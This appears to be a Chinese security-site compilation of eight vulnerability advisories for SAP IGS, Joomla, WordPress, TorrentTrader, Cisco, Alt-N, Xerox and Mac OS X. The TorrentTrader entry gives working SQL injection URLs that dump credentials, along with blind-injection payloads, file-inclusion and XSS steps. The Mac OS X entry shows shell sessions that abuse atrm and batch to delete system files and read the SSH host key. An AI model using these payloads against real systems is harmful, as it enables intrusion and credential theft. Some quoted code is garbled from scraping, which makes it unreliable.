“GotNowhere”通过精心收集,向本站投稿了8篇SAP Internet图形服务器多个远程安全漏洞,以下是小编为大家整理后的SAP Internet图形服务器多个远程安全漏洞,希望能够帮助到大家。
- 目录
篇1:SAP Internet图形服务器多个远程安全漏洞
受影响系统:SAP Internet Graphics Server 7.00 Patchlevel <= 6
SAP Internet Graphics Server 6.40 Patchlevel <= 16不受影响系统:SAP Internet Graphics Server 7.00 Patchlevel 7
SAP Internet Graphics Server 6.40 Patchlevel 17描述:
BUGTRAQ ID: 21449,21448Internet Graphics Server(IGS)是SAP R/3企业环境的一个组件,可提供图形服务,
IGS实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞获取敏感信息或执行非授权的恶意操作。
远程攻击者可以通过向SAP IGS提交特制的HTTP请求删除系统中的任意文件,
此外,远程攻击者还可以利用SAP IGS中的一些功能关闭服务器、访问配置文件或执行某些其他非授权操作。
<*来源:Mariano Nuñez Di Croce (mnunez@cybsec.com)
链接:secunia.com/advisories/23262/
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf
www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf
*>
建议:
厂商补丁:SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.sap.com/
篇2:Joomla!多个远程安全漏洞
受影响系统:Joomla! Joomla! < 1.0.11不受影响系统:Joomla! Joomla! 1.0.11描述:
Joomla!是一款开放源码的内容管理系统(CMS),Joomla!多个远程安全漏洞
。Joomla!中存在多个跨站脚本和安全限制绕过漏洞:
1) mosMail和JosIsValidEmail()函数中存在输入验证错误。
2) PEAR.php中存在安全漏洞。
3) globals.php没有包含在administrator/index.php中。
4) 由于缺少defined( '_VALID_MOS' )检查以及Admin “Upload Image”、Admin “Popups”和“com_content”功能中的错误,导致存在不充分的访问控制检查,
电脑资料
5) do_pdf功能以及处理emailform. com_content任务中的漏洞允许用户绕过认证过程。
6) 在返回给用户之前没有正确的过滤Admin “Module Manager”、Admin “Help”和Search功能的输入,导致在用户浏览器中执行任意HTML和脚本代码。
<*来源:Joomla!
链接:secunia.com/advisories/21666/
*>
建议:
厂商补丁:Joomla!
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
forge.joomla.org/sf/frs/do/viewRelease/projects.joomla/frs.joomla_1_0.1_0_11
篇3:WordPress多个远程安全漏洞
受影响系统:
WordPress WordPress 2.2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25161
WordPress是一款免费的论坛Blog系统,
WordPress处理用户提交的数据时存在多个输入验证漏洞,远程攻击者可能利用这些漏洞执行跨站脚本、SQL注入或收集敏感信息。
WordPress的themes.php、options.php、link-import.php、upload.php脚本实现存在跨站脚本执行漏洞,options.php脚本还存在SQL注入和信息泄露漏洞,
<*链接:mybeni.rootzilla.de/mybeNi//wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
wordpress.org/
文章来自: 绿盟科技
篇4:TorrentTrader Classic多个远程安全漏洞
hacknote.com
发布时间:-06-15
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
===============================================================================
Author: Janek Vind “waraxe”
Date: 15. June 2009
Location: Estonia, Tartu
Web: www.waraxe.us/advisory-74.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
BitTorrent tracker. Featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.
sourceforge.net/projects/torrenttrader
List of found vulnerabilities
===============================================================================
1. Sql Injection vulnerability in “account-inbox.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “origmsg” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Test:
localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
Result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);
$res = mysql_query(“SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=”.sqlesc($receiver).“”);
$user = mysql_fetch_assoc($res);
if (!$user)
$message = “Username not found.”;
...
if ($origmsg && $delete == “yes”)
mysql_query(“DELETE FROM messages WHERE id=$origmsg”) or sqlerr;
-----------------------------[source code end]---------------------------------
2. Weak password generation algorithm in “account-recover.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. generated password is weak and can be easily bruteforced
Preconditions:
1. attacker must know email address associated with target's account
Torrenttrader contains password reseting functionality:
localhost/torrenttrader109/account-recover.php
Anyone can initiate password reset, only condition is, that target's email
address must be know. Torrenttrader will check email address and after successful
validation new, temporal password will be generated and sent to that email address.
Specific autogenerated password appears to be random number between 10000 and 50000,
so basically there can be only 40000 possible temporal passwords. It's easy to
write bruteforce script, which will try all possible password combinations.
This process can take couple of hours or more, but eventually the password will
be guessed and target account becomes compromised.
-----------------------------[source code start]-------------------------------
if ($HTTP_SERVER_VARS[“REQUEST_METHOD”] == “POST”) {
$email = trim($_POST[“email”]);
if (!validemail($email)) {
$msg = “” . NOT_VAILD_EMAIL . “”;
$kind = “Error”;
}
else {
$res = mysql_query(“SELECT * FROM users WHERE email=” . sqlesc($email) . “ LIMIT 1”);
$arr = mysql_fetch_assoc($res);
if (!$arr) {
$msg = “” . EMAIL_INVALID . “”;
$kind = “Error”;
}
...
if ($arr) {
$newpassword = rand(10000, 50000);
$md5pass = md5($newpassword);
-----------------------------[source code end]---------------------------------
3. Unauthorized database backup vulnerability in “backup-database.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. mysqldump utility must be available
2. gzip utility must be available
3. target directory must be writable
4. database name must be known in order to successfully guess archive filename
Test:
localhost/torrenttrader109/backup-database.php
Resulting message: “Database backup successful, entry inserted into database.”
-----------------------------[source code start]-------------------------------
system(sprintf(
'mysqldump --opt -h %s -u %s -p%s %s | gzip >%s/%s/%s-%s-%s-%s.gz',
$host,
$user,
$pass,
$db,
getenv('DOCUMENT_ROOT'),
$backupdir,
$db,
$day,
$month,
$year
));
-----------------------------[source code end]---------------------------------
Attacker is able to create database backup and resulting “gz” archive's
filename can be guessed, if attacker knows database name. This file is also
directly downloadable from website. Example download URI:
localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
As result information leakage exists. For example, attacker can fetch admin
credentials from backed up database.
4. Sql Injection vulnerability in “browse.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “wherecatin” is used in sql query
Preconditions:
1. none
Test:
localhost/torrenttrader109/browse.php?wherecatin=waraxe
Result:
Unknown column 'waraxe' in 'where clause'
-----------------------------[source code start]-------------------------------
if (count($wherecatina) >1)
$wherecatin = implode(“,”,$wherecatina);
elseif (count($wherecatina) == 1)
$wherea[] = “category = $wherecatina[0]”;
...
if ($wherecatin)
$where .= ($where ? “ AND ” : “”) . “category IN(” . $wherecatin . “)”;
if ($where != “”)
$where = “WHERE $where”;
$res = mysql_query(“SELECT COUNT(*) FROM torrents $where”) or die(mysql_error());
-----------------------------[source code end]---------------------------------
This specific sql injection vulneraility can be exploited using blind attack
methods. If there is one or more active torrents in database, then usable is
attack pattern below:
1,1,2)=(SELECT+1“>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
and we see found torrents.
50,1,2)=(SELECT+1”>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
“No torrents were found based on your search criteria.”
In this way attacker is able to ask boolean questions from database and retrieve
needed information bit by bit - example of classical blind sql injection.
If there is no active torrents in database, then induced sql errors method can be used.
1,(SELECT“>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
”Subquery returns more than 1 row“
50,(SELECT”>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
“No torrents were found based on your search criteria.”
5. Information leakage in “check.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. none
Test:
localhost/torrenttrader109/check.php
This script. is originally meant to be used by installer and lately by admins.
Because of lacking access control attacker is able to use it for gathering some
useful information about target system - full path to webroot, file and directory
permissions of specific files, couple of php settings.
6. Sql Injection vulnerability in “delreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “categ” is used in sql query
Preconditions:
1. attacker must have at least super moderator privileges (user class >3)
Comments:
1. very easy to exploit
Test:
localhost/torrenttrader109/delreq.php?categ=waraxe
Result:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1
Test 2:
localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
and we can see all usernames, password hashes and emails from database.
7. Sql Injection vulnerability in “index.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “choice” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
2. there must exist at least one poll
Testing needs custom written html form.:
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
if ($_SERVER[“REQUEST_METHOD”] == “POST”)
{
$choice = $_POST[“choice”];
if ($CURUSER && $choice != “” && $choice < 256 && $choice == floor($choice))
{
$res = mysql_query(“SELECT * FROM polls ORDER BY added DESC LIMIT 1”) or sqlerr();
$arr = mysql_fetch_assoc($res) or die(“No poll”);
$pollid = $arr[“id”];
8049 = $CURUSER[“id”];
$res = mysql_query(“SELECT * FROM pollanswers WHERE pollid=$pollid && userid=8049”) or sqlerr();
$arr = mysql_fetch_assoc($res);
if ($arr) die(“Dupe vote”);
mysql_query(“INSERT INTO pollanswers VALUES(0, $pollid, 8049, $choice)”) or sqlerr();
-----------------------------[source code end]---------------------------------
8. Sql Injection vulnerability in “modrules.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “id” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
Testing needs custom written html form.:
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Test result: “MYSQL Error has occurred!”
-----------------------------[source code start]-------------------------------
elseif ($_GET[“act”]==“edited”){
$id = $_POST[“id”];
$title = sqlesc($_POST[“title”]);
$text = sqlesc($_POST[“text”]);
$public = sqlesc($_POST[“public”]);
$class = sqlesc($_POST[“class”]);
mysql_query(“update rules set title=$title, text=$text, public=$public,
class=$class where id=$id”) or sqlerr(__FILE__,__LINE__);
-----------------------------[source code end]---------------------------------
9. Information leakage in “phpinfo.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. missing access control
Preconditions:
1. none
Test:
localhost/torrenttrader109/phpinfo.php
-----------------------------[source code start]-------------------------------
phpinfo();
?>
-----------------------------[source code end]---------------------------------
This script. can be used by attacker to obtain information from php function
phpinfo(). Access to such script. must be limited to admins, but currently there
is not any access control at all.
10. Sql Injection vulnerabilities in “report.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “user” is used in sql query
2. unsanitized user submitted parameter “torrent” is used in sql query
3. unsanitized user submitted parameter “forumid” is used in sql query
4. unsanitized user submitted parameter “forumpost” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Two proof-of-concept tests below are using parameter “user”.
Test 1 needs custom written html form.:
-------------------------------------------------------------------------------
1,(SELECT 1 UNION ALL SELECT 1),1)-- “>
-------------------------------------------------------------------------------
Test result: ”MYSQL Error has occurred!“
Test 2 needs custom written html form.:
-----------------------------[source code start]-------------------------------
50,(SELECT 1 UNION ALL SELECT 1),1)-- ”>
-----------------------------[source code end]---------------------------------
Test result: “You have already reported user ...”
It's classical blind sql injection exploitation method and allows attacker to
fetch information from database bit by bit by asking boolean questions.
Other three sql injection vulnerabilities in “report.php” involve user submitted
parameters “torrent”, “forumid” and “forumpost” and exploitation can be done in
similar way as seen above.
11. Sql Injection vulnerability in “take-deletepm.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delmp” is used in sql query
Preconditions:
1. attacker must have admin privileges
-----------------------------[source code start]-------------------------------
if(isset($_POST[“delmp”])) {
$do=“DELETE FROM messages WHERE id IN (” . implode(“, ”, $_POST[delmp]) . “)”;
$res=mysql_query($do)
-----------------------------[source code end]---------------------------------
12. Sql Injection vulnerability in “takedelreport.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delreport” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
$res = mysql_query (“SELECT id FROM reports WHERE dealtwith=0
AND id IN (” . implode(“, ”, $_POST[delreport]) . “)”);
-----------------------------[source code end]---------------------------------
13. Sql Injection vulnerability in “takedelreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “delreq” is used in sql query
Preconditions:
1. attacker must be logged in as valid user
-----------------------------[source code start]-------------------------------
if (get_user_class() >UC_JMODERATOR){
...
$do=“DELETE FROM requests WHERE id IN (” . implode(“, ”, $_POST[delreq]) . “)”;
$do2=“DELETE FROM addedrequests WHERE requestid IN (” . implode(“, ”, $_POST[delreq]) . “)”;
$res2=mysql_query($do2);
$res=mysql_query($do);
...
} else {
foreach ($_POST[delreq] as $del_req){
$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
if ($delete_ok){
$do=“DELETE FROM requests WHERE id IN ($del_req)”;
$do2=“DELETE FROM addedrequests WHERE requestid IN ($del_req)”;
...
function checkRequestOwnership ($user, $delete_req){
$query = mysql_query(“SELECT * FROM requests WHERE userid=$user AND id = $delete_req”) or sqlerr();
-----------------------------[source code end]---------------------------------
14. Sql Injection vulnerability in “takestaffmess.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “clases” is used in sql query
Preconditions:
1. attacker must have admin privileges
-----------------------------[source code start]-------------------------------
adminonly();
...
$updateset = $_POST['clases'];
$query = mysql_query(“SELECT id FROM users WHERE class IN (”.implode(“,”, $updateset).“)”);
-----------------------------[source code end]---------------------------------
15. Sql Injection vulnerability in “takewarndisable.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter “warndisable” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
...
if ($disable != '') {
$do=“UPDATE users SET enabled='no' WHERE id IN (” . implode(“, ”, $_POST['warndisable']) . “)”;
$res=mysql_query($do);
}
if ($enable != '') {
$do = “UPDATE users SET enabled='yes' WHERE id IN (” . implode(“, ”, $_POST['warndisable']) . “)”;
$res = mysql_query($do);
}
-----------------------------[source code end]---------------------------------
16. Sql Injection vulnerability in “today.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “limit” is used in sql query
Preconditions:
1. none
Comments:
1. seems hard to exploit
Test:
localhost/torrenttrader109/today.php?limit=waraxe
Result:
“Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in C:apache_wwwroottorrenttrader109today.php on line 21”
17. Sql Injection vulnerability in “torrents-details.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “where” is used in sql query
Preconditions:
1. none
-----------------------------[source code start]-------------------------------
//speed mod
$resSpeed = mysql_query(“SELECT seeders,leechers FROM torrents
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15”)
or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------
Exploitation is possible using blind sql injection methods.
Test 1:
localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Result: normal page
Test 2:
localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Result: “MYSQL Error has occurred!”
18. Sql Injection vulnerability in “admin-delreq.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. uninitialized variable “categ” is used in sql query
Preconditions:
1. attacker must have at least moderator privileges
-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query(“SELECT users.username, requests.filled, requests.filledby,
requests.id, requests.userid, requests.request, requests.added, categories.name
as cat FROM requests inner join categories on requests.cat = categories.id
inner join users on requests.userid = users.id
$categ order by requests.request $limit”) or print(mysql_error());
-----------------------------[source code end]---------------------------------
Test:
localhost/torrenttrader109/admin-delreq.php?categ=waraxe
Result: “You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near 'waraxe order by requests.request LIMIT 0,50' at line 1”
19. Persistent XSS in “viewrequests.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user
Steps for testing:
a) attacker submits request:
localhost/torrenttrader109/requests.php
In “Title” field let's insert some javascript.:
testtitle
b) admin will browse requests:
localhost/torrenttrader109/viewrequests.php
and previously planted javascript. will be executed in admin session context.
20. Persistent XSS in logging funtionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user
Steps for testing:
a) attacker uploads torrent file:
localhost/torrenttrader109/torrents-upload.php
In “Torrent Name” field let's insert some javascript.:
testname
Upload is successful: “The torrent has been uploaded successfully!”
b) admin will browse logs:
localhost/torrenttrader109/admin.php?act=view_log
and previously planted javascript. will be executed in admin session context.
21. Local File Inclusion vulnerability in “backend/admin-functions.php”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. URI case-insensitivity on Windows platform
Preconditions:
1. Windows platform
2. register_globals=on
3. magic_quotes_gpc=off
-----------------------------[source code start]-------------------------------
if (strpos($_SERVER['REQUEST_URI'], “admin-functions.php”) !== false) die;
require_once(“./themes/” . $GLOBALS['ss_uri'] . “/block.php”);
-----------------------------[source code end]---------------------------------
As we can see from source code snippet above, direct access to script. is blocked.
In case of Windows and Apache combination URI handling is case-insensitive.
In other hand “strpos()” function, used for access control, is case-sensitive.
So this script. can be directly executed, if we change some characters in script's
filename to uppercase:
localhost/torrenttrader109/backend/Admin-functions.php
“Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:apache_wwwroottorrenttrader109backendadmin-functions.php on line 3”
If “register_globals=on” and “magic_quotes_gpc=off”, then LFI is possible:
localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
22. Reflected XSS in multiple scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Examples:
localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
localhost/torrenttrader109/torrents-details.php?id=1&keepget=“>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind ”waraxe“
Waraxe forum: www.waraxe.us/forums.html
Personal homepage: www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------
篇5:Cisco CallManager CLI多个远程安全漏洞
受影响系统:
Cisco Unified CallManager 5.0(3a)
Cisco Unified CallManager 5.0(3)
Cisco Unified CallManager 5.0(2)
Cisco Unified CallManager 5.0(1)
不受影响系统:
CiscoUnified CallManager 5.0(4)
描述:
BUGTRAQ ID: 18952
Cisco Unified CallManager是Cisco IP电话解决方案中基于软件的呼叫处理组件,
CallManager CLI提供了到系统的备用管理接口,以便诊断和排除基于HTTPS的主管理接口上的故障。这个以root用户权限运行的CLI在解析命令时存在两个漏洞,
第一个漏洞可能允许认证的CUCM管理员以root用户执行任意操作系统程序,第二个漏洞允许将命令输出重新定向到命令行中所指定的文件或文件夹。
Cisco Unified CallManager支持同时存在SCCP和SIP电话,这就允许迁移到SIP而仍保护对现有设备的投资。CUCM在处理SIP请求中的超长主机名时存在缓冲区溢出漏洞,可能导致执行任意代码或拒绝服务。
链接:www.cisco.com/warp/public/707/cisco-sa-0712-cucm.shtml
建议:
厂商补丁:
Cisco
Cisco已经为此发布了一个安全公告(cisco-sa-20060712-cucm)以及相应补丁:
cisco-sa-20060712-cucm:Multiple Cisco Unified CallManager Vulnerabilities
链接:www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml
补丁下载:
www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-50
篇6:AltN WebAdmin多个安全漏洞
转自:绿盟科技
发布日期:-01-28
更新日期:2005-01-31
受影响系统:
Alt-N WebAdmin 3.0.2
不受影响系统:
Alt-N WebAdmin 3.0.4
描述:
--------------------------------------------------------------------------------
WebAdmin是Alt-N技术公司开发的管理MDaemon、RelayFax和WorldClient的WEB应用程序,
Alt-N WebAdmin存在多个安全问题,远程攻击者可以利用这些漏洞进行跨站脚本,编辑用户帐户等攻击。
1、跨站脚本问题:
useredit_account.wdm没有正确过滤用户提交的URL数据,提交恶意脚本代码作为参数数据,可获得目标用户敏感信息:
server/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
2、用户可编辑所有用户帐户
useredit_account.wdm脚本对对其他帐户的访问没有任何验证,可提交如下URL请求编辑其他用户帐户信息:
server/WebAdmin/useredit_account.wdm?user=otheruser@domain
3、HTML注入
文件modalfram.wdm允许装载任意WEB页,可使用户盲目信任页面内容,
<*来源:David_Alonso (kamborio@gmail.com)
链接:marc.theaimsgroup.com/?l=bugtraq&m=110692897003614&w=2
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Alt-N
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.altn.com/products/default.asp?product%5Fid=WebAdmin
篇7:Xerox WorkCentre及WorkCentre Pro多个安全漏洞
受影响系统:Xerox WorkCentre Pro 275
Xerox WorkCentre Pro 265
Xerox WorkCentre Pro 255
Xerox WorkCentre Pro 245
Xerox WorkCentre Pro 238
Xerox WorkCentre Pro 232
Xerox WorkCentre 275
Xerox WorkCentre 265
Xerox WorkCentre 255
Xerox WorkCentre 245
Xerox WorkCentre 238
Xerox WorkCentre 232描述:
BUGTRAQ ID: 21365Xerox WorkCentre是一款数码打印复印一体机,
Xerox WorkCentre的ESS/Network Controller和MicroServer Web Server代码中存在多个安全漏洞,具体如下:
* Web用户接口上的TCP/IP用户名存在命令注入漏洞;
* Web用户接口上的Scan-to-mailbox文件夹名称字段存在命令注入漏洞;
* Web用户接口上的Microsoft Networking配置参数存在命令注入漏洞;
* 浏览器权限可能允许非授权访问;
* TFTP/BOOTP自动配置选项可能允许非授权的配置设置;
* 可使用HTTP而不是HTTPS发布Web服务请求;
* 可以劫持邮件消息签名显示不正确的项;
* Scan-to-mailbox功能可能允许匿名未经验证下载安全的文件;
* 设备无法保持精确的时间,因此审计日志中的时间戳不正确,
成功利用这些漏洞的攻击者可以获得非授权访问或更改系统配置。
<*来源:XEROX
链接:a1851.g.akamaitech.net/f/1851/2996/24h/cacheB.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1.
*>
建议:
厂商补丁:Xerox
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.xerox.com
篇8:Apple OSX多个应用程序安全漏洞
转自:绿盟科技
发布日期:2005-01-26
更新日期:2005-01-31
受影响系统:
Apple MacOS X Server 10.3.7
Apple MacOS X 10.3.7
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2005-0125
Mac OS X是一款基于BSD的操作系统,
Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。
'atrm'可以用于删除系统任意文件:
CrunkJuice:~ kevinfinisterre$ id
uidP1(kevinfinisterre) gidP1(kevinfinisterre) groupsP1(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r-- root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory
'batch'可以用于以gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)特权执行任意命令:
CrunkJuice:/tmp kevinfinisterre$ echo >aa
/usr/bin/id >/tmp/test
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory
(wait 5 minutes)
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uidP1(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
'batch'也可以用于读取系统任意文件:
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail root 0
umask 22
TERM_PROGRAM=Apple_Terminal; export TERM_PROGRAM
SHELL=/bin/bash; export SHELL
TERM_PROGRAM_VERSION0; export TERM_PROGRAM_VERSION
LDPWD=/var/at/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5:0:0; export __CF_USER_TEXT_ENCODING
PATH=/bin:/sbin:/usr/bin:/usr/sbin; export PATH
PWD=/Users/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=/Users/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
